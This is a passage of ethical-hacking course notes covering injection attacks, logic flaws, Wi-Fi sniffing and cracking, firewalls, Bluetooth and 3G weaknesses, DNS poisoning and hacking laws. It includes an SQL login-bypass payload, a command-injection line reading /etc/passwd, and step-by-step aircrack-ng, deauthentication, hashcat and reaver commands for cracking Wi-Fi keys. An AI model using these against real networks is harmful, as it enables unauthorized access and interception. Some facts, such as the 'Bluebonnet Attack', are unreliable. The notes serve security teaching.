Manipulating SQL queries by injecting malicious SQL code via input fields, URLs, or cookies.

📌 Example:
Input: ' OR '1'='1

Query: SELECT * FROM users WHERE username = '' OR '1'='1' --'

AND password = ''

●​ ' OR '1'='1' -- always returns true, bypassing login.​

📌 Impacts:
●​ Dump database contents​

●​ Modify/delete records​

●​ Bypass authentication​

●​ Remote Code Execution (RCE) in extreme cases​

🔥 Other Code Injection Types:

a) Command Injection:

●​ Inject OS-level commands​

●​ Example:​
ping 127.0.0.1 && cat /etc/passwd

b) Cross-Site Scripting (XSS):

●​ Injecting malicious JavaScript into web pages​

●​ Impacts: session hijacking, stealing cookies​

c) LDAP, XPath, or XML Injection:

●​ Similar concept, targeting other query languages or data parsers.​

🔧 Mitigation:
●​ Parameterized queries / prepared statements​

●​ Input validation and sanitization​

●​ Web Application Firewalls (WAF)​

●​ Least privilege database permissions

✅ 3. Attacking Application Logic (Business Logic Flaws)
🔎 What It Means:
This involves exploiting flaws in the intended functionality or workflow of an application
rather than attacking the underlying code or system.

💣 Example Scenarios:
a) Price Manipulation:

●​ Change product prices in client-side requests (e.g., modifying API call payloads).​

b) Privilege Escalation:

●​ Accessing admin functions due to poor role-based access control.​

c) Order of Operations Attack:

●​ Bypassing payment by manipulating the order of processes (e.g., changing "Order

Confirm" before "Payment").​

d) Race Conditions:

●​ Exploiting timing issues in applications (e.g., double-spending vulnerabilities in

e-commerce platforms).​

e) Password Reset Flaws:

●​ Predictable reset token generation allows taking over user accounts.​

🔧 Mitigation:
●​ Threat modeling​

●​ Rigorous testing of business flows​

 ●​ Role-based access control​

●​ Secure session management​

●​ Logging and monitoring

✅ Summary Table:
Attack Type Target Risk Level Impact

Unblocking Apps Network/Firewalls Medium Data leaks, policy bypass

SQL Injection Database Critical Data breach, RCE, credential theft

Command Injection OS/System Shell Critical System compromise

XSS Web Browsers High Session hijacking, data theft

App Logic Attack Business High Financial loss, privilege escalation

Workflow

✅ Ethical Hacking Use:

●​ Penetration Testing: Simulating these attacks to find and patch vulnerabilities.​

●​ Bug Bounty Hunting: Reporting these issues for rewards.​

●​ Red Teaming: Emulating adversary behaviors to test real-world security readiness.​

Chapter 4:

What is WLAN?

A Wireless Local Area Network (WLAN) allows devices to connect and communicate
wirelessly within a local area (such as homes, offices, campuses) using radio signals instead of
cables. WLANs commonly operate under IEEE 802.11 standards (Wi-Fi).

🔑 Key Components:
●​ Access Point (AP): Device that connects wireless devices to a wired network.​

●​ Wireless Clients: Laptops, smartphones, IoT devices that connect to the AP.​

●​ SSID (Service Set Identifier): Name of the wireless network.​

●​ BSSID: MAC address of the access point.​

🔐 Security Protocols:
●​ WEP (Wired Equivalent Privacy): Weak, outdated protocol.​

●​ WPA/WPA2/WPA3: Modern encryption standards ensuring better security.​

📂 Use in Ethical Hacking:

●​ Wireless LANs are common targets due to their broadcast nature.​

●​ Ethical hackers test WLANs for vulnerabilities like weak encryption, default settings, and
unauthorized access.

🛰️ Wireless Network Sniffing

🔎 What is Sniffing?
Sniffing is the process of capturing data packets traveling over a network. In wireless sniffing,
attackers monitor wireless traffic to gather sensitive information.

🔧 Tools Used:
 ●​ Wireshark​

●​ Kismet​

●​ Aircrack-ng suite​

●​ Acrylic Wi-Fi​

🛠️ Purpose in Ethical Hacking:

●​ Capture unencrypted data packets.​

●​ Identify active devices and SSIDs.​

●​ Monitor for sensitive information like passwords, emails, or session tokens.​

⚠️ Risks:
●​ Can expose usernames, passwords, and other personal information if the network is
unprotected or uses weak encryption.

🎭 Wireless Spoofing
🔎 What is Spoofing?
Spoofing refers to impersonating a legitimate wireless device or access point to deceive network
users.

🛠️ Types of Wireless Spoofing:

●​ MAC Spoofing: Changing your device’s MAC address to impersonate another device.​

●​ Rogue Access Point: Setting up a fake AP with the same SSID to attract clients (Evil
Twin Attack).​

●​ Deauthentication Attack: Forcing users to disconnect so they reconnect to a rogue AP.​

🔧 Tools Used:
 ●​ airbase-ng​

●​ MDK3​

●​ Karma attacks​

●​ Scapy​

🚨 Impact:
●​ Intercept sensitive information.​

●​ Launch Man-in-the-Middle (MITM) attacks.​

●​ Bypass MAC-based filtering security.

🚪 Port Scanning
🔎 What is Port Scanning?
Port scanning is the act of probing a target machine or network to identify open ports, services
running, and potential vulnerabilities.

📈 Common Port Scanning Techniques:

●​ TCP Connect Scan​

●​ SYN Scan (Half-Open)​

●​ UDP Scan​

●​ Stealth Scans (FIN, NULL, Xmas)​

🔧 Tools Used:
●​ Nmap​

●​ Netcat​
 ●​ Masscan​

●​ Unicornscan​

🔐 Purpose in Ethical Hacking:

●​ Map the network and identify targets.​

●​ Detects services with known vulnerabilities.​

●​ Assess the security posture of a system.

🔍 Wireless Network Probing

🔎 What is Probing?
Probing involves sending requests to detect available wireless networks and gather information
about them. Attackers can also send probe requests to see if specific networks respond.

🛠️ Types of Probing:
●​ Passive Probing: Listening to beacon frames without sending any requests.​

●​ Active Probing: Sending probe requests to trigger responses from hidden SSIDs or APs.​

🔧 Tools Used:
●​ Kismet​

●​ airodump-ng​

●​ WiFi Explorer​

🚨 Use in Cybersecurity:
●​ Identify hidden networks.​
 ●​ Discover connected devices and client behaviors.​

●​ Collect information for future attacks like spoofing or sniffing.

✅ Summary Table
Concept Purpose Tools Use in Ethical Hacking

WLAN Connect devices - Understand how Wi-Fi networks

Overview wirelessly operate and potential weaknesses

Sniffing Capture data packets Wireshark, Monitor traffic, extract sensitive data
Kismet

Spoofing Impersonate airbase-ng, Perform MITM attacks, gather

devices/APs MDK3 credentials

Port Find open Nmap, Netcat Identify vulnerabilities for

Scanning ports/services exploitation

Probing Discover airodump-ng, Gather intel for attacks, detect hidden

networks/devices Kismet SSIDs

💻 Real-World Ethical Hacking Scenario

A penetration tester might:

1.​ Scan for open Wi-Fi networks.​

2.​ Use sniffing to collect unencrypted data.​

 3.​ Identify hidden SSIDs through probing.​

4.​ Deploy a fake AP to perform spoofing.​

5.​ Use port scanning to find vulnerable services on connected devices.​

1. AP Weakness (Access Point Weaknesses)

📌 Definition:
AP Weaknesses refer to vulnerabilities in wireless access points (APs) that attackers can exploit
to compromise a wireless network.

📌 Common Weaknesses:
●​ Weak Encryption: Using outdated encryption like WEP, which is easily crackable.​

●​ Default Credentials: Many APs come with default usernames/passwords that are widely
known.​

●​ SSID Broadcasting: Continuously broadcasting the network name can make it easy for
attackers to find the network.​

●​ Open Networks: No password protection allows anyone within range to connect.​

●​ Firmware Vulnerabilities: Outdated firmware may have unpatched security holes.​

📌 Risks:
●​ Unauthorized network access​

●​ Data interception​

●​ Network hijacking​

●​ Malware injection​

📌 Ethical Hacking Approach:

 ●​ Scanning for APs using tools like Airodump-ng or Kismet​

●​ Checking for weak encryption standards​

●​ Testing password strength using dictionary or brute-force attacks​

●​ Suggesting security improvements like WPA3 and disabling SSID broadcast

2. Denial of Service (DoS) Attacks

📌 Definition:
A DoS attack aims to make a system, service, or network unavailable to users by overwhelming
it with traffic or exploiting vulnerabilities.

📌 Types of DoS Attacks:

●​ Volume-Based Attacks: (UDP floods, ICMP floods) consume bandwidth​

●​ Protocol Attacks: (SYN floods) exploit server resources​

●​ Application Layer Attacks: Target web servers, DNS, or APIs (e.g., HTTP GET/POST
floods)​

📌 Impact:
●​ Service disruption​

●​ Revenue loss for businesses​

●​ Damage to reputation​

📌 Ethical Hacking Approach:

●​ Using controlled tools like LOIC/HOIC (Low Orbit Ion Cannon/High Orbit Ion
Cannon) in a lab environment​

●​ Performing stress tests to identify system limits​

 ●​ Recommending defenses like:​

○​ Firewalls​

○​ Rate limiting​

○​ Load balancers​

○​ Cloud-based DDoS mitigation services (Cloudflare, AWS Shield)

3. Man-in-the-Middle (MITM) Attacks

📌 Definition:
A MITM attack occurs when an attacker secretly intercepts and possibly alters communication
between two parties who believe they are directly communicating.

📌 Techniques Used:
●​ ARP Spoofing: Manipulating the ARP table to redirect traffic​

●​ DNS Spoofing: Redirecting domain name requests to malicious websites​

●​ HTTPS Stripping: Downgrading connections from HTTPS to HTTP​

●​ Wi-Fi Eavesdropping: Setting up fake APs to intercept data​

📌 Impact:
●​ Data theft (passwords, personal info, financial data)​

●​ Session hijacking​

●​ Malware injection​

📌 Ethical Hacking Approach:

●​ Tools like Ettercap, Wireshark, Bettercap to simulate attacks​
 ●​ Detecting and demonstrating MITM vulnerabilities​

●​ Recommending:​

○​ End-to-end encryption (SSL/TLS)​

○​ Using VPNs​

○​ ARP/DNS monitoring tools​

○​ Public key infrastructure (PKI)

4. War Driving
📌 Definition:
War Driving is the act of driving around with a laptop, smartphone, or other device to detect
unsecured wireless networks.

📌 Purpose:
●​ Identify and map vulnerable networks​

●​ Target APs with weak security for attacks​

📌 Tools Used:
●​ Kismet​

●​ NetStumbler​

●​ WiGLE (Wireless Geographic Logging Engine) for mapping APs​

●​ GPS devices to log locations​

📌 Risks:
●​ Unauthorized network access​
 ●​ Data interception​

●​ Further attacks like DoS or MITM​

📌 Ethical Hacking Approach:

●​ Conduct controlled war driving to identify organizational weak points​

●​ Advise businesses on:​

○​ Strong encryption (WPA3)​

○​ Hiding SSIDs​

○​ Regular network audits​

○​ MAC address filtering (though not fully secure)

Wireless Security Best Practices

Wireless networks are vulnerable because signals can be intercepted. Good practices reduce the
risk of unauthorized access.

🔒 1. Use Strong Encryption

●​ WPA3 (latest and most secure)​

●​ WPA2 (widely used but crackable with poor passwords)​

●​ Avoid WEP – weak and easily breakable.​

🔒 2. Strong Passwords / Passphrases

●​ Use long, complex passphrases combining uppercase, lowercase, numbers, and symbols.​

●​ Change default SSID and password.​

🔒 3. Disable WPS (Wi-Fi Protected Setup)
●​ WPS is vulnerable to brute-force attacks (Pixie Dust attack).​

●​ Turn off WPS on routers.​

🔒 4. Network Segmentation
●​ Create separate networks for guests, IoT devices, and main users.​

🔒 5. Use MAC Address Filtering (Optional)

●​ Only allow known devices. Not a strong security layer as MACs can be spoofed.​

🔒 6. Regular Firmware Updates

●​ Keep your router firmware updated to patch vulnerabilities.​

🔒 7. Monitor Network Traffic

●​ Detect anomalies or unknown devices connected.

🛠 Wireless Network Software Tools (For Ethical Hacking &

Auditing)

Tool Purpose Description

Aircrack-ng WEP/WPA/WPA2 Cracking Suite for monitoring, attacking, testing,

cracking Wi-Fi.

Kismet Wireless Network Detector & Captures packets, identifies networks and
Sniffer devices.
Wireshark Packet Analysis Network protocol analyzer for packet
inspection.

Reaver WPS Attack Brute-forces WPS PIN to recover

WPA/WPA2 passphrase.

Fern WiFi GUI Tool for Easy for beginners, supports cracking
Cracker WEP/WPA/WPA2 cracking and sniffing.

Bettercap Network attacks (MITM) Supports sniffing and wireless attacks.

Hashcat Password Cracking High-speed cracking of WPA

handshakes.

Wifite2 Automated WPA/WPA2 Automates capturing handshakes and

Cracking cracking.

Ettercap Man-in-the-middle attack Network sniffing and MITM for

wired/wireless.

💥 Cracking WEP (Wired Equivalent Privacy)

🔎 Why WEP is Insecure
●​ Uses weak RC4 encryption.​

●​ IV (Initialization Vector) is 24-bit → Repeats frequently.​

 ●​ Captured packets can reveal the key.​

🛠 WEP Cracking Process (Using Aircrack-ng)

1.​ Start Monitor Mode: airmon-ng start wlan0​

2.​ Scan for Target: airodump-ng wlan0mon​

3.​ Capture Packets: airodump-ng --bssid [target BSSID] -c [channel]

-w wep_capture wlan0mon​

4.​ Send Deauth to Speed up Capture: aireplay-ng --deauth 100 -a

[BSSID] wlan0mon​

5.​ Crack the WEP Key: aircrack-ng wep_capture.cap​

📌 Outcome: WEP can be cracked in minutes due to weak IV design.

💥 Cracking WPA / WPA2 (Wi-Fi Protected Access)
🔎 How WPA/WPA2 Works
●​ WPA/WPA2 uses a 4-way handshake to verify the client and router.​

●​ WPA2-PSK (Pre-Shared Key) is most common in home networks.​

●​ Vulnerable to password-based attacks if a weak passphrase is used.​

🛠 WPA/WPA2 Cracking Process (Handshake Capture)

1.​ Enable Monitor Mode: airmon-ng start wlan0​

2.​ Scan Networks: airodump-ng wlan0mon​

 3.​ Capture Handshake: airodump-ng --bssid [BSSID] -c [channel] -w
capture wlan0mon​

4.​ Force Handshake (Deauth): aireplay-ng --deauth 5 -a [BSSID] -c

[client MAC] wlan0mon​

5.​ Verify Handshake in .cap file: aircrack-ng capture.cap

🛠 Cracking the Captured Handshake

Method 1: Dictionary Attack (Aircrack-ng)

aircrack-ng -w wordlist.txt -b [BSSID] capture.cap

●​ Depends on the quality of the wordlist.​

●​ Can fail if the password is complex.​

Method 2: Brute Force (Hashcat) hashcat -m 22000 -a 3 capture.hc22000

?d?d?d?d?d?d?d?d

●​ Converts .cap to .hccapx or .hc22000 format.​

●​ GPU accelerated cracking.​

🔎 WPA/WPA2 Vulnerabilities
●​ Weak Passphrase: Human-chosen passwords often guessable.​

●​ WPS Attack (Reaver): Exploits poorly implemented WPS.​

reaver -i wlan0mon -b [BSSID] -c [channel] -vv
 ●​ PMKID Attack (WPA2): Captures PMKID without a client.​

hcxdumptool -i wlan0mon -o dump.pcapng --enable_status=1

Convert to Hashcat:hcxpcapngtool -o capture.hc22000 dump.pcapng

🔥 WPA3 Note (Latest Standard)

●​ Uses Simultaneous Authentication of Equals (SAE) or Dragonfly handshake.​

●​ More resistant to offline brute-force attacks.​

●​ Currently difficult to crack unless poorly configured or vulnerable devices are used.

🚀 Defensive Measures Against Cracking

●​ Use WPA3 if possible.​

●​ Strong, complex passphrase.​

●​ Disable WPS.​

●​ Use VLANs or guest networks for IoT devices.​

●​ Regularly monitor your network for rogue access points or unknown clients.

🧠 Conclusion
WEP Easily Crackable – Avoid Completely

WPA Weak with dictionary attacks if passphrase is bad

WPA2 Still secure if passphrase is strong

 WPA3 Strongest, but not widely deployed yet

As an Ethical Hacker, these methods should be used only for penetration testing with
permission to secure networks by finding weaknesses and fixing them.

Chapter 5:

1. Safer Tools and Services in Cyber Security & Ethical Hacking

These tools help ethical hackers and security experts identify vulnerabilities, monitor networks,
and ensure safety.

Categories of Tools:

Tool Type Examples Use

Vulnerability Scanners Nessus, OpenVAS Scanning systems for vulnerabilities

Penetration Testing Metasploit, Burp Simulating attacks to find weak spots

Tools Suite

Network Monitoring Wireshark, Nmap Capturing and analyzing network traffic

Tools

Password Cracking John the Ripper, Testing password strength and cracking
Tools Hashcat hashes

Forensics Tools Autopsy, FTK Analyzing digital evidence post-breach

Encryption Tools VeraCrypt, GnuPG Encrypting sensitive data

 SIEM Tools Splunk, QRadar Real-time monitoring and analysis of
logs/events

🔥 2. Firewalls in Cyber Security

Firewalls are the first line of defense—designed to filter incoming and outgoing traffic based on
predetermined rules.

Types of Firewalls:

Type Description Example

Packet Filtering Examines packets against rule sets Cisco ACLs

Stateful Inspection Tracks connection states Check Point

Proxy Firewalls Acts as an intermediary Squid Proxy

Next-Gen Firewall (NGFW) Includes IDS/IPS, SSL inspection Palo Alto, Fortinet

Web Application Firewall Protects web apps from attacks like Cloudflare, AWS
(WAF) XSS, SQLi WAF

Key Functions:

●​ Block/allow traffic​

●​ Monitor traffic behavior​

 ●​ Prevent malware infiltration​

●​ Enforce security policies

🔎 3. Filtering Services
Filtering services are additional protective layers, specifically targeting types of content or data
streams.

Types of Filtering:

Type Purpose Examples

URL/Content Filtering Blocks malicious or inappropriate sites Websense,

Barracuda

DNS Filtering Filters DNS queries to malicious OpenDNS, Quad9

domains

Email Filtering Blocks spam, phishing, malware emails Mimecast,

Proofpoint

Data Loss Prevention Prevents sensitive data leaks Symantec DLP

(DLP)

🛠️ 4. Firewall Engineering (Design & Best Practices)

Firewall engineering involves proper configuration, placement, and hardening of firewall
systems.

Core Steps:
 1.​ Define Security Policy — Identify acceptable use, services, and traffic flow.​

2.​ Design Network Architecture:​

○​ DMZ (Demilitarized Zone) for public services (web/email servers)​

○​ Internal Networks for sensitive resources​

3.​ Rule Set Design: Principle of least privilege—only necessary ports/services are allowed.​

4.​ Redundancy & High Availability: Failover configurations​

5.​ Regular Updates & Patch Management​

6.​ Logging & Monitoring: Ensure every action is logged for auditing​

7.​ Penetration Testing the Firewall: Validate rules and configurations against simulated
attacks

📡 5. Secure Communications Over Insecure Networks

The goal is to prevent eavesdropping, tampering, and man-in-the-middle (MITM) attacks.

Techniques & Protocols:

Method Description Example

Tools/Protocols

VPN (Virtual Private Creates an encrypted tunnel over public OpenVPN, IPSec,
Network) networks WireGuard

SSH (Secure Shell) Encrypts remote login sessions PuTTY, OpenSSH

TLS/SSL Secure website communication HTTPS

 IPSec Secure IP communication, used in
VPNs

End-to-End Encryption Only sender and receiver can read Signal, WhatsApp
(E2EE) messages

TLS for Email Secures SMTP/IMAP/POP3 STARTTLS

Zero Trust Model Never trust, always verify—even inside

the network

Best Practices:

●​ Use strong encryption algorithms (AES-256, RSA-2048+)​

●​ Mutual authentication​

●​ Regular certificate management​

●​ Implement perfect forward secrecy (PFS)

✅ Conclusion
In Cyber Security & Ethical Hacking, mastering these layers of defense and tools ensures:

●​ Strong network perimeter security​

●​ Data integrity and confidentiality​

●​ Resilience against attacks​

●​ Compliance with security standards like ISO 27001, PCI DSS, GDPR​
Case Study: Mobile Hacking - Bluetooth and
3G Network Weaknesses
🔎 Introduction
With the growth of mobile technology, smartphones have become integral to our daily lives,
carrying sensitive personal and financial data. However, mobile communication channels like
Bluetooth and 3G networks have historically been targeted by hackers due to various
vulnerabilities.

1️⃣ Bluetooth Weaknesses and Exploitation

🔐 Overview of Bluetooth Technology
●​ Short-range wireless technology for communication between devices.​

●​ Operating range: 10-100 meters.​

●​ Common uses: file sharing, hands-free calls, IoT device pairing, and more.​

⚠ Bluetooth Security Weaknesses

Vulnerability Description

Bluejacking Sending unsolicited messages to nearby Bluetooth-enabled devices.

Harmless but intrusive.

Bluesnarfing Unauthorized access to information (contacts, SMS, photos) via

Bluetooth. Exploited poor access control.

Bluebugging Taking full control of the victim’s phone via hidden Bluetooth
connection. Enables call interception, message sending, and
eavesdropping.

Car Whispering Exploiting Bluetooth-enabled car kits to inject or record audio.

Bluetooth Attacker impersonates a previously paired device and gains

Impersonation (BIAS) unauthorized access.
🛠 Tools Used in Bluetooth Hacking
●​ Bluesnarf​

●​ BlueBugger​

●​ BTScanner​

●​ hciconfig & hcitool (Linux utilities)​

●​ Ubertooth One (for advanced Bluetooth sniffing)​

📌 Real-World Example
"Bluebonnet Attack" (2017)

●​ A set of critical Bluetooth vulnerabilities allowing hackers to take control of devices

without user interaction.​

●​ Affected billions of devices (Android, Windows, Linux).​

●​ Result: Remote code execution and potential full device compromise.

2️⃣ 3G Network Weaknesses and Exploitation

📶 Overview of 3G Technology
●​ Third Generation of mobile telecommunications.​

●​ Introduced better data rates, mobile internet, and enhanced encryption over 2G.​

⚠ 3G Security Weaknesses
Vulnerability Description

Downgrade Attacks Forced downgrade from 3G to 2G (less secure) for easier

interception (Example: IMSI Catcher).

IMSI Catchers Fake base stations trick phones into connecting, revealing user
(Stingrays) identity and location.
Man-in-the-Middle Intercepting communication by relaying data between mobile and
(MitM) base station.

Lack of End-to-End Only encrypts between phone and base station; data is decrypted in
Encryption the core network.

SS7 Protocol Though designed for 2G, still used in 3G for roaming, enabling
Vulnerabilities location tracking, call interception, and SMS hijacking.

🛠 Tools and Devices for Exploitation

●​ IMSI Catchers / Stingray​

●​ OpenBTS / YateBTS (Fake base stations)​

●​ Software Defined Radios (SDR)​

●​ SS7 Testing Tools​

📌 Real-World Example
"SS7 Exploits"

●​ Attackers used SS7 flaws to:​

○​ Track phone locations globally.​

○​ Intercept calls and SMS (e.g., banking OTPs).​

○​ Redirect calls/SMS for espionage.

✅ Defensive Measures in Cybersecurity

Attack Vector Mitigation

Bluetooth - Disable Bluetooth when not in use.

- Use "non-discoverable" mode.
- Update firmware to patch vulnerabilities.
- Avoid pairing with unknown devices.
 3G Networks - Use VPNs for secure communication.
- Upgrade to 4G/5G where possible (stronger encryption).
- Use apps with end-to-end encryption (Signal, WhatsApp).
- Awareness of potential IMSI catcher zones.

🤖 Role of Ethical Hacking

🧠 Why Ethical Hacking Matters Here
●​ Penetration testers use these vulnerabilities in controlled environments to:​

○​ Test corporate mobile devices.​

○​ Audit network security of telecom infrastructure.​

○​ Educate users about safe mobile practices.​

●​ Tools like SDRs and Bluetooth sniffers help simulate real-world attacks.

🔮 Conclusion
Mobile hacking through Bluetooth and 3G network weaknesses remains a critical threat in
cybersecurity. Despite the phase-out of 3G, legacy vulnerabilities persist, especially in less
developed regions. Ethical hackers play a vital role in identifying, testing, and mitigating these
weaknesses to protect users, data, and mobile infrastructures.

💻 Suggested Tools & Frameworks for Further Study

●​ Kali Linux / Parrot OS (For mobile and wireless pen-testing)​

●​ Ubertooth One (Bluetooth sniffing)​

●​ OpenBTS / YateBTS (Mobile network research)​

●​ Wireshark / Scapy (Packet analysis)​

●​ SDR Tools (HackRF, RTL-SDR) (Signal interception)​

Case Study: DNS Poisoning (DNS Spoofing)
📌 What is DNS Poisoning?
DNS Poisoning or DNS Spoofing is a cyber attack in which corrupted DNS data is inserted into
the DNS resolver’s cache, causing the DNS server to return an incorrect IP address. This
redirects users to malicious websites without their knowledge.

📌 How Does DNS Poisoning Work?

●​ DNS servers store domain-to-IP mappings.​

●​ In DNS Poisoning, the attacker intercepts or forges DNS responses.​

●​ The attacker injects fake data (malicious IP) into the cache.​

●​ When users try to visit legitimate websites, they’re redirected to fake, harmful websites
(e.g., phishing, malware).​

📌 Real-World Example: The 2010 DNS Cache Poisoning Attack

●​ Attackers poisoned DNS caches of several ISPs.​

●​ Users visiting popular sites like Facebook or Gmail were redirected to fake versions of
these sites.​

●​ Attackers stole sensitive data like login credentials and banking information.​

📌 Impacts of DNS Poisoning

✅ Phishing Attacks​
✅ Malware Distribution​
✅ Data Theft (credentials, banking info)​
✅ Network Disruption
📌 Detection and Prevention
Detection Prevention

Monitor DNS traffic Implement DNSSEC (DNS Security

Extensions)

Compare responses from multiple DNS Use reputable DNS resolvers

servers

Use intrusion detection systems Regular DNS server patching and updates

⚖️ Hacking Laws in Cyber Security and Ethical Hacking

📌 What is Ethical Hacking?
Ethical hacking involves legally breaking into computers and devices to test an organization’s
defenses. It's done by professionals known as white-hat hackers who help improve security.

📌 Important International Hacking Laws

Country/Regio Law/Act Description
n

USA Computer Fraud and Abuse Criminalizes unauthorized access to

Act (CFAA) computers.

India Information Technology Covers hacking, data theft, cyber terrorism,

Act, 2000 (IT Act) and phishing.

EU General Data Protection Regulates data protection and privacy;

Regulation (GDPR) hacking leads to fines and penalties.

UK Computer Misuse Act 1990 Addresses hacking, unauthorized access, and

denial-of-service attacks.

📌 Key Offenses in Hacking Laws

✅ Unauthorized access to computers/networks​
✅ Data theft or data breach​
✅ Identity theft and phishing​
✅ Malware distribution​
✅ Cyber terrorism
📌 Penalties for Hacking (General Examples)
Offense Possible Punishment

Data Theft 3-7 years imprisonment + fine

Unauthorized Access 3-5 years imprisonment + fine

Cyber Terrorism Life imprisonment

Financial Fraud via Hacking Heavy fines + jail time depending on the amount

👨‍💻 Legal Framework for Ethical Hackers

✅
✅
Ethical hacking is legal only when: There is written permission from the organization.​

✅
It follows defined scope and guidelines.​
The hacker reports vulnerabilities responsibly.

Unauthorized hacking, even with good intentions, is illegal under most laws.

📌 Conclusion
DNS Poisoning is a serious cyber attack with far-reaching consequences. Laws worldwide
recognize the severity of hacking and impose strict penalties. However, ethical hacking — done
legally — plays a crucial role in protecting cyberspace.